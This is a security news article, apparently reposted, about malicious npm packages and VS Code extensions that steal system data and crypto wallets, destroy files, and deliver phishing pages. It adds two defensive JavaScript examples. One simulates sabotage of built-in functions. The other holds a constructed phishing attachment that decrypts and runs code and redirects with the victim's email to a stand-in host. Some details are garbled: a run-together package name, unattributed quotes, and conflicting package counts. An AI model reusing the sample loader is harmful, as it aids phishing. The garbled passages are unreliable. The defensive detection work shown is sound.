Fyself News
Over 70 malicious NPM and VS code packages found stealing data and ciphers

May 26, 2025

Security researchers have discovered as many as 60 malicious npm packages in the package registry with functionality to harvest hostnames, IP addresses, DNS servers, and user directories and send them to an attacker-controlled Discord endpoint.

The packages, published under three different accounts, come with install-time scripts that run automatically during npm installation, Socket security researcher Kirill Boychenko said in a report published last week. The packages have collectively been downloaded over 3,000 times.

“The scripts target Windows, macOS, or Linux systems, include basic sandbox-evasion checks, and are a potential source of valuable reconnaissance for every infected workstation or continuous integration node,” the software supply chain security company said.

The three accounts, each of which published 20 packages within an 11-day period, are listed below. None of them still exists on npm:

  • BBB335656
  • CDSFDFAFD1232436437
  • SDSDS656565

The malicious code is explicitly designed to fingerprint every machine that installs the package, but aborts if it detects that it is running in a virtualized environment associated with Amazon, Google, and other cloud providers, Socket said.

The harvested information, including host details, system DNS servers, network interface card (NIC) information, and internal and external IP addresses, is sent to a Discord webhook.

“By harvesting internal and external IP addresses, DNS servers, usernames, and project paths, it helps threat actors chart networks and identify valuable targets for future campaigns,” Boychenko said.


This disclosure follows another set of eight npm packages that masquerade as helper libraries for widely used JavaScript frameworks such as React, Vue.js, Vite, Node.js, and the open-source Quill editor, but deploy a destructive payload once installed. They have been downloaded over 6,200 times and remain available for download from the repository:

  • Vite-Plugin-Vue-Extend
  • Quill-Image-Downolder
  • JS-Hood
  • JS-Bomb
  • Bum-Plugin-Bumb-Plugin-Bomb-Plugin-Bomb-Plugin-Bomb-Extend (the remaining Vite plugin names are run together in the source)
  • Vite-Plugin-react-Extend

“While secretly harboring destructive payloads designed to destroy data, delete important files, and crash systems, these packages remained undetected, posing as legitimate plugins and utilities,” said Socket security researcher Kush Pandya.

Some of the identified packages are designed to run automatically when a developer invokes them in a project, recursively deleting files related to Vue.js, React, and Vite. Others are designed to corrupt fundamental JavaScript methods and tamper with browser storage mechanisms such as localStorage, sessionStorage, and cookies.


Another notable package is JS-Bomb, which not only deletes Vue.js framework files but also initiates a system shutdown depending on the current runtime.
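Silent corruption of core JavaScript methods is hard to notice from the outside because the application keeps running with subtly wrong results. A cheap runtime check is to snapshot references to the built-ins you depend on before any third-party code loads and re-verify them afterwards, falling back to a native-code test when no early snapshot exists. The block below is an added example written for this page, not code from the article or from Socket; the watched list and the simulated sabotage are assumptions made for the example.

```javascript
// Added example (not from the article or from Socket): a runtime integrity check for
// core JavaScript built-ins, aimed at the silent corruption of basic methods described
// above. Watched list and simulated sabotage are assumptions made for this example.
// Caveat: a payload that also replaces Function.prototype.toString can defeat the
// native-code test, so the early reference snapshot is the stronger signal.
const WATCHED = [
  ["Array.prototype.map",      Array.prototype,  "map"],
  ["Array.prototype.filter",   Array.prototype,  "filter"],
  ["Array.prototype.includes", Array.prototype,  "includes"],
  ["JSON.parse",               JSON,             "parse"],
  ["JSON.stringify",           JSON,             "stringify"],
  ["String.prototype.replace", String.prototype, "replace"],
];

// Captured at module load, before any third-party code could have patched it.
const nativeToString = Function.prototype.toString;

// Take this snapshot as early as possible (first line of the entry point).
function snapshotBuiltins() {
  return new Map(WATCHED.map(([name, obj, key]) => [name, obj[key]]));
}

// Returns a list of {name, reason}; an empty list means nothing looked tampered.
// With a baseline, a changed reference is reported directly; otherwise (or when the
// reference is unchanged) the function falls back to checking for native code.
function checkBuiltins(baseline) {
  const problems = [];
  for (const [name, obj, key] of WATCHED) {
    const current = obj[key];
    if (baseline && current !== baseline.get(name)) {
      problems.push({ name, reason: "reference-changed" });
      continue;
    }
    const looksNative = typeof current === "function" &&
      /\{\s*\[native code\]\s*\}/.test(nativeToString.call(current));
    if (!looksNative) problems.push({ name, reason: "not-native" });
  }
  return problems;
}

function restoreBuiltins(baseline) {
  for (const [name, obj, key] of WATCHED) obj[key] = baseline.get(name);
}

// Constructed stand-in for a sabotaging package: subtly corrupts map() and parse().
function simulateSabotage() {
  const realMap = Array.prototype.map;
  Array.prototype.map = function (...args) { return realMap.apply(this, args).reverse(); };
  JSON.parse = function () { return null; };
}

function demo() {
  const baseline = snapshotBuiltins();
  simulateSabotage();
  console.log("after sabotage:", checkBuiltins(baseline));
  restoreBuiltins(baseline);
  console.log("after restore:", checkBuiltins(baseline));
}
if (typeof require !== "undefined" && require.main === module) demo();
```

In a real application the snapshot belongs in the first module evaluated and the check in a periodic health probe or a pre-commit/CI smoke test, so a tampered dependency is caught before it reaches production data.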

The activity is attributed to a threat actor named xuxingfeng, who has also published five legitimate, non-malicious packages that work as intended. Some of the rogue packages were released as far back as 2023. “This dual approach of releasing both harmful and useful packages creates a façade of legitimacy that makes it more likely that users will trust and install the malicious packages,” Pandya said.

The findings also come as researchers have uncovered a new attack campaign that combines traditional email phishing with JavaScript code shipped as part of a malicious npm package disguised as a benign open-source library.

“Once communication was established, the package loaded and delivered a second-stage script with customized phishing links using the victim’s email address, leading to a fake Office 365 login page designed to steal credentials.”


The starting point of the attack is a phishing email carrying a malicious .htm file that loads, via the jsDelivr CDN, encrypted JavaScript code associated with an npm package named CitiyCar8. Once loaded, the JavaScript payload embedded in the package initiates a URL redirect chain that eventually leads the user to a fake landing page designed to capture credentials.

“This phishing attack shows a high level of sophistication, with threat actors chaining technologies like AES encryption, npm packages delivered via CDNs, and multiple redirects to hide malicious intent,” Cerda said.


“The attack not only shows a creative way for attackers to evade detection, but also highlights the importance of vigilance in the ever-evolving landscape of cybersecurity threats.”
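The delivery chain described above (an .htm attachment that pulls a script from a CDN-hosted npm package, decrypts an embedded blob client-side, and then redirects with the victim's email address in the URL) leaves static traces that mail-gateway triage can key on even when the decrypted stage is unavailable. The following is an added example written for this page, not code from the article or from the researchers who reported the campaign; the rule names, the thresholds, the sample attachment, and the package name "example-loader" are constructed for the example.

```javascript
// Added example (not from the article or the researchers): static triage of an .htm
// email attachment for the delivery chain described above. Rules, thresholds, the
// sample attachment and the package name "example-loader" are constructed here.
const SCRIPT_SRC   = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
const CDN_NPM      = /^https?:\/\/(?:cdn\.jsdelivr\.net\/npm|unpkg\.com)\/((?:@[^/]+\/)?[^/@?#]+)/i;
const DECRYPT      = /CryptoJS\.AES\.decrypt|crypto\.subtle\.decrypt|\.decrypt\s*\(/;
const REDIRECT     = /(?:window\.|document\.|top\.)?location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\s*\(|http-equiv\s*=\s*["']refresh["']/i;
const EMAIL_IN_URL = /[?#&](?:email|user|login)=|encodeURIComponent\([^)]*(?:email|user|victim)/i;
const M365_LURE    = /office\s*365|microsoft|outlook|onedrive|sharepoint/i;

// Returns a verdict plus the reasons and any npm packages pulled from a CDN.
function triageHtmlAttachment(html) {
  const reasons = [];
  const cdnPackages = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const c = CDN_NPM.exec(m[1]);
    if (c) cdnPackages.push(c[1]);
  }
  if (cdnPackages.length)      reasons.push("npm-package-loaded-from-cdn");
  if (DECRYPT.test(html))      reasons.push("client-side-decryption");
  if (REDIRECT.test(html))     reasons.push("redirect-logic");
  if (EMAIL_IN_URL.test(html)) reasons.push("email-address-in-url");
  if (M365_LURE.test(html))    reasons.push("m365-lure-keywords");
  const verdict = reasons.length >= 3 ? "quarantine" : reasons.length ? "suspicious" : "clean";
  return { verdict, reasons, cdnPackages };
}

// Constructed sample attachment (no real package, CDN path, key or ciphertext).
const SAMPLE_PHISH = `<!doctype html><html><head>
<meta name="description" content="Office 365 document share">
<script src="https://cdn.jsdelivr.net/npm/example-loader@1.0.0/dist/loader.min.js"></script>
</head><body>
<script>
  var blob = "constructed-placeholder-ciphertext";
  var code = CryptoJS.AES.decrypt(blob, "k").toString(CryptoJS.enc.Utf8);
  new Function(code)();
  window.location.href = "https://example.invalid/verify?email=" + encodeURIComponent(victim);
</script></body></html>`;

const SAMPLE_CLEAN = `<!doctype html><html><body><p>Quarterly report attached as PDF.</p></body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(triageHtmlAttachment(SAMPLE_PHISH));
  console.log(triageHtmlAttachment(SAMPLE_CLEAN));
}
```

The keyword rule alone is noisy (any legitimate Microsoft notification matches it), which is why a single hit only yields "suspicious"; the combination of a CDN-hosted npm loader, in-page decryption, and a redirect is what should route the attachment to quarantine or detonation.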

Abuse of open-source repositories for malware distribution has become a proven approach to carrying out supply chain attacks at scale. In recent weeks, Microsoft’s Visual Studio Code (VS Code) Marketplace has also been found to host data-stealing extensions designed to capture cryptocurrency wallet credentials, targeting Solidity developers on Windows.

The activity has been attributed to a threat actor tracked by Datadog Security Research as MUT-9332. The extensions are named:

  • solaibot
  • on-eth
  • blankebesxstnion

“The extensions hide harmful code within legitimate functionality and use command-and-control domains that appear to be related to Solidity, which are not usually flagged as malicious,” Datadog researchers said.

“All three extensions employ complex infection chains that contain multiple stages of obfuscated malware, including payloads hidden within image files hosted on the Internet Archive.”

Specifically, the extensions were advertised as providing syntax scanning and vulnerability detection for Solidity developers. Although they offer genuine functionality, they are designed to deliver a malicious payload that steals cryptocurrency wallet credentials from victims’ Windows systems. All three extensions have since been removed.

The ultimate goal of the VS Code extensions is to slip in a malicious Chromium-based browser extension that can plunder Ethereum wallets and exfiltrate them to command-and-control (C2) endpoints.


They are also equipped to install another executable that captures keystrokes and scans the application data directory for Discord, Chromium-based browsers, cryptocurrency wallets, and Electron applications.

MUT-9332 is also assessed to be behind a recently disclosed campaign that used 10 malicious VS Code extensions to install the XMRig cryptominer by passing them off as coding or artificial intelligence (AI) tools.

“This campaign shows the incredibly creative lengths MUT-9332 is willing to go to hide its malicious intentions,” Datadog said. “Updates to these payloads suggest that this campaign is likely to continue, and detection and removal of the first batch of these malicious VS Code extensions may prompt MUT-9332 to change tactics for subsequent ones.”
